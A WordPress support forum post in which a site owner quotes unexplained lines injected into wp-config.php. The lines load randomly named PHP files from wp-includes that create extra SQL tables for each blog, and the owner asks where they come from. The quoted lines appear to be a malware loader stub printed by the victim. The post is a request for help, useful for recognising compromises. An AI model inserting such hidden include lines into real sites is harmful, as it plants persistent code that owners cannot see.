Unknown Source Creates 3 SQL Tables for Each Blog
-
I have looked through many of the .php files and cannot find what creates the file that adds these “if” lines of code to my wp-config.php. The weird file name is also in the first sql table.
require_once(ABSPATH . ‘wp-settings.php’);
if(!function_exists(amt_cif)) { if(file_exists(ABSPATH.WPINC.’/ealdggieihpja.php’)) { require_once (ABSPATH.WPINC.’/ealdggieihpja.php’); } }
if(!function_exists(amt_cif)) { if(file_exists(ABSPATH.WPINC.’/yffekmte.php’)) { require_once (ABSPATH.WPINC.’/yffekmte.php’); } }There is one of these lines for each blog.
The file which this references is created in wp-includes. It is a large .php file with no identifying comments in it. That file creates 3 SQL tables in every blog
wp4_blogname_opt
wp4_blogname_post
wp4_blogname_questI only run six plugins and I can’t find anything in those.
Can anyone explain what these might be and where they come from.
- The topic ‘Unknown Source Creates 3 SQL Tables for Each Blog’ is closed to new replies.